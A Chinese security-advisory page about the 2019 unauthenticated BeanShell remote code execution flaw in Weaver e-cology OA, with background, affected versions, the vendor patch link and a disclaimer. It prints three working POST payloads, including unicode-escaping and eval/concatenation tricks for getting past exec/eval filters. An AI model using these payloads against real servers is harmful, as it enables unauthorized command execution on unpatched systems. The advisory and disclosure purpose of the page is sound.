泛微ecology OA远程代码执行漏洞BeanShell检测与补丁(BSH漏洞)
事件背景
2019年9月17日泛微OA官方更新了一个远程代码执行漏洞补丁,泛微e-cology OA系统的JAVA Beanshell接口可被未授权访问,攻击者调用该Beanshell接口,可构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程命令执行,漏洞等级严重。
影响版本
e-cology <=9.0
威胁等级
高危
漏洞复现
泛微OA BeanShell复现测试:地址
print命令
exec命令
Post提交数据
Poc1:bsh.script=exec("whoami")
如果有全局过滤器过滤了exec或eval,会有报错,可以采用unicode编码、字符串拼接等方式绕过。
Poc2:bsh.script=\u0065\u0078\u0065\u0063("whoami");&bsh.servlet.output=raw
Poc3:
bsh.script=eval%00("ex"%2b"ec(bsh.httpServletRequest.getParameter(\"command\"))");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami
批量验证脚本
该脚本组合了常用的泛微OA web路径,加上本文讲解绕过过滤器的3个Poc。该工具仅用于测试研究使用请勿他用。
泛微官方安全补丁
https://www.weaver.com.cn/cs/securityDownload.asp
免责声明
本文中提到的漏洞利用Poc和脚本仅供研究学习使用,请遵守《网络安全法》等相关法律法规。
关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/
关注网络尖刀微信公众号
随时掌握互联网精彩
随时掌握互联网精彩
赞助链接
排名
热点
搜索指数
- 1 总书记深深牵挂雪域高原上的人们 4917796
- 2 小米首款汽车起售21.59万 贵吗? 4937540
- 3 雷军“朋友圈”表情包火了 4846306
- 4 抓住“热辣滚烫”的“春日经济” 4766150
- 5 黄圣依杨子直播事件6人被刑拘 4656255
- 6 女子住民宿发现多个隐藏空间 4528831
- 7 小米汽车27分钟大定突破50000台 4414341
- 8 业主吐槽效果图像鬼屋被回怼 4355352
- 9 面具男用病毒针扎人系谣言 4292974
- 10 王诗龄回国炫富生活引关注 4108305